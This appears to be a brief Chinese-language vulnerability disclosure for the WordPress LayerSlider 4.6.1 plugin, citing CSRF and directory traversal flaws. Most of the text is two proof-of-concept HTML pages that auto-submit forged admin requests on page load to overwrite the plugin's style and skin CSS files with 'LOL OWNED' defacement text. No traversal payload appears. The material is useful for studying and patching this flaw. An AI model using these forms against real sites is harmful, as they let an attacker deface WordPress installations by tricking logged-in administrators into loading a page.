路人甲 2014-03-15 07:50:33
WordPress LayerSlider 4.6.1 CSRF / Traversal
漏洞描述
WordPress LayerSlider plugin version 4.6.1 suffers from cross site request forgery and directory traversal vulnerabilities.
测试代码
CSRF Defaced url can be found here: http://owned.tld/wp-content/uploads/layerslider.custom.css ============CSRF 1============================================ <body onload="javascript:document.forms[0].submit()"> <form action="http://owned.tld/wp-admin/admin.php?page=layerslider_style_editor&edited=1" method="post"> <input type="hidden" name="posted_ls_styles_editor" value="1"> <textarea rows="10" cols="50" name="contents" id="editor">LOL OWNED</textarea> </form> =========== CSRF 2===================================================== Defaced URL can be found here: http://owned.tld/wp-content/plugins/LayerSlider/skins/noskin/skin.css ====================================================== <body onload="javascript:document.forms[0].submit()"> <form action="http://owned.tld/wp-admin/admin.php?page=layerslider_skin_editor" method="post" class="inner"> <input type="hidden" name="posted_ls_skin_editor" value="1"> <textarea rows="10" cols="50" name="contents" id="editor"> LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED LOL OWNED </textarea> </form> =====================================================